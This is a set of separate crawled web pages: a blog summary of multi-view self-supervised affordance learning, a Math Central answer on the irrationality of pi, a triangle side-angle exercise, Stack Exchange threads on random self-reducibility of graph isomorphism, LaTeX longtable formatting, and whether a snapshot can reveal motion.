Multi-view learning, sometimes also referred to using the terms ‘cross-modal learning’, ‘multi-modal learning’ or ‘co-clustering’ is a type of machine learning where, rather than being isolated to a single feature space, learning is instead performed over multiple separate feature spaces, otherwise known as ‘data views’ or ‘modalities’, in which data co-occur. Given this common theme, the learning goal may otherwise differ depending on the particular context. In our object affordance learning scenario, object properties such as shape features define the feature space in one data view, the input space $X \subseteq \mathbb{R}^m$, whereas object effects observed from interaction, such as motion features and changes in shape features, define the feature space in another data view, the output space $Y \subseteq \mathbb{R}^n$. We assume that matching data co-occur in each of them.
Visualisation of SSLVQ cross-view Hebbian projection.
Our learning goal is to find significant clusters in $Y$ (upper part of above figure) that may be projected back to $X$ (lower part of above figure) and used as class labels to train a classifier, thus forming a mapping $f : \mathbb{R}^m \rightarrow \mathbb{N}$ from input space feature vectors to class labels representing affordances grounded in output space feature clusters. We consider this as a multi-view learning problem given that there is a natural separation between the two feature spaces under consideration, which model potential causes and potential effects respectively, and also as a self-supervised learning problem given that the class clusters must be discovered in output space $Y$ in an unsupervised manner before being exploited for supervised discriminative learning in input space $X$, a process that must occur online, dynamically and autonomously.
Our solution to this problem involves representing each of the data views via vector quantization using codebooks of prototype vectors $W = \{ {\mathbf w}_j \in \mathbb{R}^{m} \,\left|\, j = 1,\ldots,M \right. \}$ for the input space and $V = \{ {\mathbf v}_k \in \mathbb{R}^{n} \,\left|\, k = 1,\ldots,N \right. \}$ for the output space, respectively, approximating the data distributions in each view. We train the codebooks in each view using combinations of the self-organizing map (SOM) algorithm and extended forms of the learning vector quantization (LVQ) algorithm, while also training the cross-view weights that connect them using Hebbian learning. The interested reader is referred to the IJARS paper for further details. The project code is not well optimized, organised, or maintained, but I am preserving it on Github for posterity and potential future inspiration. | 2018-05-24 17:55:06 | {"extraction_info": {"found_math": true, "script_math_tex": 9, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4607774317264557, "perplexity": 1765.173545991389}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794866733.77/warc/CC-MAIN-20180524170605-20180524190605-00179.warc.gz"} |
http://mathcentral.uregina.ca/QQ/database/QQ.09.06/s/matthew1.html | SEARCH HOME
Math Central Quandaries & Queries
Question from Matthew, a student: I have what I like to think of as a rather interesting question that I can't explain confidently for the life of me. If we take a circle with a radius of 1 and we calculate the circumference, we can use 2 pi R. Doing this calculation results in a circumference of 6.28318530717~ which goes on forever. However, if you were to take a that same circle in the real world, say with radius 1cm and wrap a string around it, and then measure the string, you don't get 6.28~, you get something like 6.2, a much more finite distance. The length of the string is not an irrational number, like the math claims it to be. Naturally this occurs because pi is an irrational number, but why is it? My only guess is that our current estimation of pi is not actually correct to "true pi", but its just really really close. If however this is the case, why hasn't the "true pi" been discovered? Is anyone actually working on that problem and what kind of methods are used for such a thing? Any insight that can help me get a better understanding of this problem would be much appreciated.
Matthew, we have two responses for you:
Matthew,
If you measure the time two sprinters take to run 100 meters, the answer you will get depends on the instrument you take:
• With your wrist watch you might say the winner took 10 seconds and the loser 11 seconds.
• With a good stopwatch you might say the winner took 10.2 seconds and the loser 10.9 seconds.
• With a video camera you might say the winner took 10.218 seconds and the loser 10.874 seconds.
• With even better instruments you might even say that the winner took 10.217734 seconds and the looser 10.874037 seconds.
• And so on.
So I would say that the real time'' that the sprinters take, if such a thing exists, is an irrational number.
It is the same thing with pi: If I measure the circumference/diameter of a small coin with a string, I am happy to get 3. But if I take a larger circle and use better instruments, I get 3.14. With even larger circles and even better instruments, I would get even more decimals correct. And so on.
But because pi is a mathematical concept (ratio of circumference to diameter on an idealised circle) rather than a physical event (a race), it is possible to compute it mathematically rather than physically. On this University of St. Andrews web page we read that after centuries of calculations with polygons,
John Machin used the formula π/4 = 4 arctan(1/5) - arctan(1/129) and James Gregory's series for arctan(x) [to get 100 decimals of pi.]
Lambert proved that pi was irrational in 1761.
Claude Tardiff.
Hi Matthew.
You are using a device that only has a certain amount of precision. A ruler might measure 0.05 cm at best, other devices can get much more precise, but no device can get the uncertainty below about 10-33 cm (and no such device is possible!). So there is in fact a "rounding off" implicit in your measurements.
Pi is a number which is irrational, and so numeric representation of it will necessarily be an approximation (3.14, for example, or 22/7 or 3.1415926535897932384626433832795029). However, we don't just have "approximations" or "estimates" of pi. We know its value precisely, we just can't express it in decimal or fraction form, because then it would be rational (by definition).
Some valid and absolutely precise expressions of Pi:
• The ratio of the circumference C to the diameter D of a perfect circle.
• Several more forms are at this web page and this web page. And there are certainly other much more advanced ways to find the exact value of pi.
Some people continue to calculate more and more decimal places for more accurate approximations of pi. I see someone has posted the first billion digits of pi on the internet. And other people continue to try to memorize a lot of digits of pi as well (although why anyone would want to be able to remember and recite 67000 digits is something I'll never understand).
Stephen.
Math Central is supported by the University of Regina and The Pacific Institute for the Mathematical Sciences. | 2017-11-18 17:39:35 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7576220035552979, "perplexity": 566.1344357437594}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934805008.39/warc/CC-MAIN-20171118171235-20171118191235-00275.warc.gz"} |
https://realmath.de/english/geometry/triangle/angleside.php | Triangle » Topic: Triangles Side-angle relationship A triangle ABC has been drawn. The angle measures of the interior angles and the side lengths are measured. Move the points of the triangle ABC and observe the respective angle measures and side lengths. Which of the following statements are correct?
Side-angle relationship
If α > 90° ⇒ a > b and a > c. If α = β ⇒ a = b. If α < 20° and β > 95° ⇒ c > b. If α > 60° and β < 60° ⇒ b > a. If β is smallest, b is shortest.
realmath.de
... more than just practicing | 2022-11-28 02:09:09 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.893178403377533, "perplexity": 901.1888115005183}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710462.59/warc/CC-MAIN-20221128002256-20221128032256-00853.warc.gz"} |
https://cstheory.stackexchange.com/questions/33274/are-graph-and-group-isomorphism-problems-random-self-reducible/33352 | # Are Graph and Group Isomorphism problems random self-reducible?
Are Graph and Group Isomorphism problems known to be random self-reducible? If so is there a good proof?
Are there other non-trivial examples of random self-reducibility? Is there a good reference?
• What do you mean exactly by "random self-reducible"? – Kaveh Dec 6 '15 at 23:04
• @Kaveh Something along lines of Dlog or permanent like in en.wikipedia.org/wiki/Random_self-reducibility – T.... Dec 6 '15 at 23:19
• So you want to reduce the problem of deciding if graph $G$ is isomorphic to $H$ to deciding isomorphism on $m = \textrm{poly}(n)$ pairs $(G_1, H_2), \ldots, (G_m, H_m)$ where each $(G_i, H_i)$ is distributed uniformly over all pairs of graphs on n vertices? This makes little sense since a uniformly distributed pair of graphs is non-isomorphic with very high probability. Do you mean something else? (As has been pointed out before, you should think harder before asking questions.) – Sasho Nikolov Dec 7 '15 at 1:46
• @SashoNikolov In here books.google.com/…" it is stated graph isomorphism is random self reducible. What does it mean here? – T.... Dec 7 '15 at 4:12
• It's the notion from this paper dx.doi.org/10.1109/SFCS.1987.49. The reduction takes $(G, H)$ and outputs $(G, H')$, where $H'$ is $H$ with the vertices uniformly permuted. This reduces GI to distinguishing between the cases (1) $H$ is a uniform graph from the isomorphism class of $G$; (2) $G$ and $H$ are not isomorphic. But this is not a reduction to uniform instances of GI. The question is, what notion of random self-reducability do you want, precisely? – Sasho Nikolov Dec 7 '15 at 5:01
For Group Isomorphism, this is not known. However, it's also somewhat of a funny question, because of how much the group order can restrict the structure of a group. In many senses, most groups are of order $2^k$, and are nilpotent of class 2. I find it hard to see how one would get a random self-reduction for GroupIso... | 2020-04-08 23:22:28 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8465547561645508, "perplexity": 541.4996827689281}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371824409.86/warc/CC-MAIN-20200408202012-20200408232512-00071.warc.gz"} |
https://tex.stackexchange.com/questions/458463/table-formatting-using-xltabular | # Table formatting using xltabular
I am having some issues with formatting the below table.
The first issue: It is not positioning after the text and instead is starting on a new page despite the positioning !htbp.
The second issue: The table is large but it is not breaking over to the second page. I am unsure about why this is happening.
\textit{Table 2} outlines the structure of this document
\begin{table}[!htbp]
\caption {Document Structure} \label{tab:Document Structure}
\begin{xltabular}{\textwidth}{|X|}
\hline
\multicolumn{1}{|c|}{Chapter One: Introduction} \\ \hline
This chapter will introduce the project and provide the,reader with context of the subject along with the reasons for undertaking the,project and an outline of the project contents. \\
\hline
\multicolumn{1}{|c|}{Chapter Two: Literature Review} \\ \hline
This chapter will review current literature surrounding,the subjects of this project this will explore the current systems and,theoretical systems that form the basis for this project. \\ \hline
\multicolumn{1}{|c|}{Chapter Three: Technology Review} \\ \hline
Throughout this chapter will provide a review of the,technology used in current systems and the technology that will be used for,the proposed system. \\ \hline
\multicolumn{1}{|c|}{Chapter Four: Analysis of Current Systems} \\ \hline
In this chapter a comparison of current systems will be,provided to form a platform from which to model the proposed system. This comparison,will be used to model the functionality of the system and methodology used,for testing the system. \\ \hline
\multicolumn{1}{|c|}{Chapter Five: System Analysis and Requirements} \\ \hline
In this chapter the base functionality for the proposed system,will be discussed and a draft of its implementation will be provided in the,form of system and communication diagrams. \\ \hline
\multicolumn{1}{|c|}{Chapter Six: Use Cases} \\ \hline
Throughout this chapter some examples of use cases will be given. these use cases will for the basis for the modeling of system functionality going forward with the project. For the purpose of this project three use cases will be given. chapter,five. \\ \hline
\multicolumn{1}{|c|}{Chapter Seven: System Design} \\ \hline
Throughout this chapter the system implementation will be,described and discussed based on the findings from chapter four and chapter,five. \\ \hline
\multicolumn{1}{|c|}{Chapter Eight: Software} \\ \hline
This chapter will discuss the software and how it was,constructed with reference to functionality and system requirements discussed,in previous chapters. \\ \hline
\multicolumn{1}{|c|}{Chapter Nine: Implementation} \\ \hline
In this chapter the implementation and integration of the,software into the hardware environment will be discussed with further,reasoning into the choices made on both software modelling and hardware,choices for this project. \\ \hline
\multicolumn{1}{|c|}{Chapter Ten: System Testing} \\ \hline
Throughout this chapter a set of test methods will be discussed,,and results of these tests will be displayed. The chosen test method for this,project is user interaction dialogues. \\ \hline
\multicolumn{1}{|c|}{Chapter Eleven: Evaluation} \\ \hline
This chapter will include a critical evaluation of the,system as well as any changes and limitations that were experienced along,with how these limitations were dealt with and how the project was adapted to,these changes. \\ \hline
\multicolumn{1}{|c|}{Chapter Twelve: Conclusion} \\ \hline
In this chapter a conclusion will be drawn, and a review,of the objectives will be carried out to determine if the project achieved the, aims that were set out for it. \\ \hline
\end{xltabular}
\end{table}
• Please provide a minimal working example (MWE). – user156344 Nov 5 '18 at 12:14
• you have placed it in a table environment which is a non-breakable float. – David Carlisle Nov 5 '18 at 12:43
• also there is no reason to use a one column table, but here even more you have X specified but over-ride it as c on every line so theer is no X column at all and tabularx has no way to force the table to teh specified width. – David Carlisle Nov 5 '18 at 12:45
• @DavidCarlisle, what would i use in place of \begin{table}? – bdg Nov 5 '18 at 12:48
• nothing the package makes your tabular in to a longtable, see the package docs. But it isn't clear why you have a table at all, what is the difference between a 1-column table and normal text paragraphs? – David Carlisle Nov 5 '18 at 12:49
From looking at the example text that you have there, it looks to me like we are in the document structure part of your report/thesis.
Given the question, I would suggest longtable and booktabs for what you are trying to accomplish.
Longtable allow you to span multiple pages and booktabs give you some nice control over rules.
\documentclass[11pt]{report}
\usepackage{longtable, booktabs}
\begin{document}
\textit{Table 2} outlines the structure of this document
\begin{longtable}{p{\textwidth}l}
\textbf{Chapter One: Introduction} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will introduce the project and provide the,reader with context of the subject along with the reasons for undertaking the, project and an outline of the project contents. &\\ \addlinespace[10pt]
\textbf{Chapter Two: Literature Review} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will review current literature surrounding,the subjects of this project this will explore the current systems and,theoretical systems that form the basis for this project. &\\ \addlinespace[10pt]
\textbf{Chapter Three: Technology Review} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter will provide a review of the,technology used in current systems and the technology that will be used for,the proposed system. &\\ \addlinespace[10pt]
\textbf{Chapter Four: Analysis of Current Systems} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter a comparison of current systems will be,provided to form a platform from which to model the proposed system. This comparison,will be used to model the functionality of the system and methodology used,for testing the system. &\\ \addlinespace[10pt]
\textbf{Chapter Five: System Analysis and Requirements} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter the base functionality for the proposed system,will be discussed and a draft of its implementation will be provided in the,form of system and communication diagrams. &\\ \addlinespace[10pt]
\textbf{Chapter Six: Use Cases} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter some examples of use cases will be given.\ these use cases will for the basis for the modeling of system functionality going forward with the project. For the purpose of this project three use cases will be given.\ chapter,five. & \\ \addlinespace[10pt]
\textbf{Chapter Seven: System Design} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter the system implementation will be,described and discussed based on the findings from chapter four and chapter,five. &\\ \addlinespace[10pt]
\textbf{Chapter Eight: Software} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will discuss the software and how it was,constructed with reference to functionality and system requirements discussed,in previous chapters. &\\ \addlinespace[10pt]
\textbf{Chapter Nine: Implementation} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter the implementation and integration of the,software into the hardware environment will be discussed with further,reasoning into the choices made on both software modelling and hardware,choices for this project. &\\ \addlinespace[10pt]
\textbf{Chapter Ten: System Testing} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
Throughout this chapter a set of test methods will be discussed,,and results of these tests will be displayed. The chosen test method for this,project is user interaction dialogues. &\\ \addlinespace[10pt]
\textbf{Chapter Eleven: Evaluation} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
This chapter will include a critical evaluation of the,system as well as any changes and limitations that were experienced along,with how these limitations were dealt with and how the project was adapted to,these changes. &\\ \addlinespace[10pt]
\textbf{Chapter Twelve: Conclusion} &\\ \cmidrule[\heavyrulewidth](l{-5pt}r{20pt}){1-2}
In this chapter a conclusion will be drawn, and a review,of the objectives will be carried out to determine if the project achieved the, aims that were set out for it. &\\ \bottomrule
\caption{Document Structure}\label{tab:Document Structure}
\end{longtable}
\end{document}
This should give you the following outcome:
• It should be noted that this only answers your question, I wouldn't use tables for this kind of thing. – Ole Aldric Nov 5 '18 at 13:05 | 2021-06-20 06:41:17 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9960094690322876, "perplexity": 3348.5631312259975}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623487658814.62/warc/CC-MAIN-20210620054240-20210620084240-00354.warc.gz"} |
https://physics.stackexchange.com/questions/508066/is-there-any-physical-evidence-for-motion | # Is there any physical evidence for motion?
Let's say that we have 2 tennis balls in space, one being in motion (say, pushed by an astronaut), and the other one still.
If we could take a snapshot of both tennis balls, would there be any evidence that could suggest that one is moving and the other one is still? Is there anything happening, at the atomic level or bigger, being responsible for the motion?
If there isn't, and both balls are absolutely identical, then how come one is still and the other one moving? Where does the difference of motion come from?
• Current theories don’t support an absolute notion of motion at all. They support notions of relative motion and of absolute changes in motion. Oct 13, 2019 at 21:15
• @StudyStudy Your comment seems to suggest that if I see an object moving relative to me that a force must be acting on it. This is not the case. Oct 14, 2019 at 5:53
• @StudyStudy No, force is a required for acceleration. If either ball is changing velocity, then detecting forces might work, but then you'll probably have better ways to determine that than looking at the heat created by material deformation as a consequence of an outside force. (for one, it might be gravity doing the acceleration - good luck detecting a local heat change from that) Oct 14, 2019 at 8:02
• Your question contains an inherent contradiction. You're asking about motion, but with the constraint that there be no passage of time (i.e., all you have is a snapshot). The problem is that you can't define motion without the concept of time. If you could relax the constraint (say, with multiple snapshots taken at different times), then you could start to define motion. But as it is, you can't, and therefore the question can't really be answered. Oct 14, 2019 at 17:55
• @Richter65 I think it is valid to ask what is the evidence collected from a still snapshot that an object is moving, because in terms of latent properties, the masses have nonzero momentum with respect to each other. The inability to observe such a property from a projection down to a single point in time does not contradict the existence of such a property, which becomes evident as time progresses. What the OP is asking is whether there is any remnant or indication of the momentum effect that could be observed from a single instantaneous observation. Oct 15, 2019 at 18:54
According to classical physics: no. It is impossible to tell how fast something is moving from a snapshot.
According to special relativity: yes. If we choose a frame of reference where one of the balls is at rest then only that ball will look normal. The other ball is moving in this frame so it will be length contracted. If its rest length is $$L$$ then its length will now be $$L\sqrt{1-v^2/c^2}$$. Since $$1-v^2/c^2<1$$ the ball will be shorter in the direction it is moving.
According to quantum mechanics: yes? In quantum mechanics particles are described by a wavefunction $$\psi(x)$$ which (handwavingly) says how much of the particle is present at a certain point. A tennis ball is also described by a wavefunction which you can get by combining all the wavefunctions of its atoms. The wavefunction actually contains all the information you can possibly know about an object, including its velocity. So if you could pause time and look at the wavefunction you would have enough information to know its (most likely) velocity. In real life you can't actually look at wavefunctions: you have to perform an experiment to extract information from the wavefunction. At this point you might wonder if that still counts as taking a snapshot.
• "According to quantum mechanics: yes?" Had a good chuckle at that. The most quantum of answers. Oct 14, 2019 at 12:40
• With an ideally perfect camera and ideally identical tennis balls, with motion not perpendicular to the camera, could you not use doppler shift in the spectrum to tell at least one of them was moving relative to the camera, (And which one, if you had the tennis ball to compare the photos to?) Oct 14, 2019 at 12:49
• You are ignoring the Penrose-Terrell effect. A photograph would not show the flattening that special relativity predicts. math.ucr.edu/home/baez/physics/Relativity/SR/penrose.html Oct 14, 2019 at 13:00
• You should specify in the answer what you mean by "snapshot". You seem to have interpreted it not as a photo but as a slice of the universe at a fixed coordinate time. There's no way to actually freeze a slice of the universe, so your answers end up depending on arbitrary assumptions about the magical process by which this was done. There's no record of the motion in the Newtonian case not because of any property of Newtonian mechanics, but because your magical process saved only the positions and threw away the velocities. Oct 14, 2019 at 16:22
• I don't quite understand the QM answer. Classically, a system's state is the position and velocity of each particle. If you're saying a quantum snapshot contains the full wavefunction information, then surely a comparable classical snapshot contains both position and velocity! Saying that this is somehow a feature of quantum physics is misleading.
– JiK
Oct 15, 2019 at 8:25
If we could take a snapshot of both tennis balls, would there be any evidence that could suggest that one is moving and the other one is still?
We can't. Problem solved.
Well, almost problem solved. So in reality, we can take shorter and shorter exposures. I can take a 1 second exposure of the scene, where the moving tennis ball will be heavily blurred while the stationary one will be crisp. I can capture the same scene at 1/100th of a second, and moving ball will look more crisp like the stationary one. I can capture the same scene at 1/1000th of a second, and it will be very difficult for the human eye to discern which one is in motion. I can make these snapshots shorter and shorter. Indeed, we have looked at imaging scenes at such exacting shutter speeds that we can watch light propagate through the scene. But we never quite hit a perfect standstill. We never hit an infinitely fast shutter speed.
Now forgive me if I handwave a bit, but there is an unimaginably large body of evidence that motion exists. In particular, you'll fail to predict very much if you assume no motion occurs. So from that empirical point of view, we should find that motion exists. From a philosophical point of view, there's some interesting questions to be had regarding endurable versus perdurable views of the universe, but from a scientific perspective, we generally agree that motion exists.
So how do we resolve the conundrum you are considering? The answer is calculus. Roughly 400 years ago, Isaac Newton and Gottfried Leibniz independently developed a consistent way of dealing with infinitesimally small values. We generally accept this as the "correct" way of handling them. It does not permit us to consider a shutter speed which is truly infinite, letting us isolate a moment perfectly, to see if there is motion or not, but it does let us answer the question "what happens if we crank the shutter speed up? What if we go 1/100th of a second, 1/1000th, 1/100000th, 1/0000000000th of a second and just keep going?" What happens if we have an infinitesimally small exposure period in our camera?
Using that rigor, what we find is that modeling the world around us really requires two things. The first is the values you are familiar with, such as position. And the second is the derivatives of those familiar things, such as velocity. These are the results of applying the calculus to the former group.
We find that models such as Lagrangian and Hamiltonian models of systems work remarkably well for predicting virtually all systems. These systems explicitly include this concept of a derivative in them, this idea of an "instantaneous rate of change." So we say there is motion, because it seems unimaginably difficult to believe that these patterns work so well if there was not motion!
As a side note, you set up your experiment in space, so there's nothing much to interact with. However, had you set the experiment up in the water, you would find the chaotic flow behind the moving ball very interesting. It would be ripe with fascinating and beautiful twirls that are very hard to explain unless associated with some forward motion.
• I'm not in the slightest suggesting that motion does not exist, it would be absurd. I completely get all the newtonian - and other - sciences around motion, I'm not a conspirationnist. I'm just saying that it baffles me that in true life, when you look at the balls, you can't see any difference at all between them, yet one ball is moving and the other one isn't. It truly is fascinating to me. It doesn't seem to make sense that 2 objects in the very exact same state can have different behaviours. How come? Where is the difference stored? Oct 14, 2019 at 6:25
• @Skeptron they don't have the same state though - they have different velocities. They only appear to have the same state when the means by which you choose to observe the state are contrived to limit perception of the aspect of their state you're interested in. There is no such thing as directly observing something's state; only inferring it from interacting with it. If your interaction somehow takes place in infinitesimal time then velocity is imperceptible, but I'd argue this is impossible in absolute terms. Even with infinitesimal shutter speed, red-shift will still differentiate them.
– Will
Oct 14, 2019 at 8:37
• @Skeptron There would also not be the slightest difference between a green ball and a red ball if you decided to observe them only in the dark ... Oct 14, 2019 at 9:38
• @Skeptron they also "hold information" about their velocity, whether you observe them over a finite time interval or not. Indeed, even the different-colored balls would be differently-colored again if they had no thermal energy, so the distinction is at best one between ordered and disordered kinetic energy.
– Will
Oct 14, 2019 at 12:58
• But I think some of the issue you're having is mentioned in the last sentence of your comment. "... 2 objects in the very exact same state can have different behaviors." The two balls are not in the same state. The position only captures part of the state, not all of it. It's akin to the clever projections of the Godel Escher Bach book. In the case of that cover, a 2-d projection does not fully capture the 3d state of an object. In your case, a 3d "snapshot" of its position does not fully capture... Oct 14, 2019 at 15:09
It is about the frame of reference, in the frame of reference of the tennis ball pushed by the astronaut, it could be considered as standing still and the other ball, the astronaut, and everything else as moving. For the frame of reference of the other ball it could be considered as standing still, and the first ball as moving. If you were with either one, in it's frame of reference, all of the physical laws of the universe would be the same and neither could be preferred as absolute. This is one of the basics of relativity.
• One realization which helps understand that motion is only relative to an arbitrary inertial system is that the common cases we refer to as "standing still" (e.g., my keyboard as I type appears to be motionless -- I can hit the keys pretty reliably!) are in reality hurtling through space at enormous speeds and on complicated trajectories composed of the rotation and orbits of the earth, sun, galaxy, local group and space expansion. One could make a cosmological case for using the microwave background as an absolute reference frame but that wouldn't change special relativity of motion. Oct 14, 2019 at 10:04
• To elaborate on "we are not standing still": Not only are we moving from most reasonable points of view; we are not even in an inertial system because of the rotational components. We are under permanent acceleration: We are not standing still relative to any inertial system. Oct 14, 2019 at 10:07
# Cylinders Don't Exist
If I show you a picture of two round objects and tell you that one is a sphere and the other is a cylinder you are looking at head-on, how can you tell whether I am telling the truth or lying? You can't, and therefore, I conclude that there is no difference between spheres and cylinders, because we lack the proper evidence for their existence.
# Projection
The point here is that motion requires time, and a snapshot is a projection of a 4-D extended object into 3- or 2-D. The most naive such projections will necessarily destroy information about additional dimensions. If I remove one of the axes which would help you distinguish a cylinder from a sphere (ignoring light reflections, etc.), this is no different than you removing the time dimension to make it impossible to distinguish between a moving or a static object.
# Conclusion
If you want to establish the separate existence of spheres and cylinders, you must examine them in all the dimensions which make them different. If you want to establish the existence of dynamic 4-D objects (objects which vary in the time dimension), you must examine them in all the dimensions which differentiate them from purely static objects (ones which are constant along the time dimension).
• Who said anything about cylinders? Oct 14, 2019 at 20:24
• @ja72 This answer introduces cylinders/spheres as an analogy for moving/not-moving. Oct 15, 2019 at 7:42
• I think this answer is underrated. None of the others even attempt address the perceived problem in the question. If you think about all 4 dimensions as having all their points being simultaneously present, and our perception of time as just hindered, then what you have is really the equivalent of a 4d, unchanging model, like a display piece. This feels off, as it precludes change on the model itself, but can't think of how you would disprove it. Zero information transmitted (directly, not via inference or prediction) between moments in time seems suspect, if all moments are already exist. Jan 21, 2021 at 23:56
Your question assumes one ball is moving and the other is still. That assumption is meaningless without specifying a frame of reference. All motion is relative. To each of the balls it would appear that the other was moving. The 'evidence' that they are moving includes the fact that they would appear smaller to each other, and that their separation was changing.
You are limiting your snapshot to a 3D picture.
If you took a 2D snapshot, it would be impossible to tell how deep your tennis "balls" are (in addition to being unable to tell their motion).
So, take a 4D "snapshot", and all'll be fine.
• This answer could explain what a 4D snapshot means and why it would show motion.
– JiK
Oct 15, 2019 at 10:28
If we could take a snapshot of both tennis balls, would there be any evidence that could suggest that one is moving and the other one is still? Is there anything happening, at the atomic level or bigger, being responsible for the motion?
If the balls are truly identical and you are at rest with respect to one of them, the light of the one moving will look more red or blue, depending on whether it is moving toward or away from you, by the Doppler shift. This would be most evident if you were positioned between the balls and on their axis, but you would always be able to do it as long as the moving ball is at least partially approaching or moving away from you.
• A friendly addendum: this only identifies a ball in motion relative to the observer, not that one of the balls has intrinsic motion that the other ball does not have. You can freely choose the frame of reference of the observer to make one ball, or the other, or both, be in motion. Oct 15, 2019 at 17:10
The photos would look identical, but you would have to take each photo from a different inertial frame of reference. You have to be moving in a different speed in a different direction to take the photo. This shows that there is inherent differences between objects in motion.
If there isn't, and both balls are absolutely identical, then how come one is still and the other one moving? Where does the difference of motion come from?
I don't think this question is nearly as perplexing as you might think nor do I think it requires sophisticated physics like the best answer describes. Ask yourself, how do you show with a snapshot that a bowl of soup is at a cold 5 C vs a warm 45 C? Or how could you show that a radio is turned off or is blaring music? Intuitive solutions to these questions would be to take a picture with a thermometer or an oscilloscope attached to a microphone respectively in the same frame.
The easiest way to show with a snapshot that a tennis ball is moving, is by taking a picture with a speedometer reading in the same frame as the ball.
These examples are hard to show directly in a single snapshot in time because they all involve the collective motion of small particles (uniform velocity for motion, random for thermal, and periodic for sound). And motion is described as the change of movement with time, but a snapshot captures an instance in time not a change.
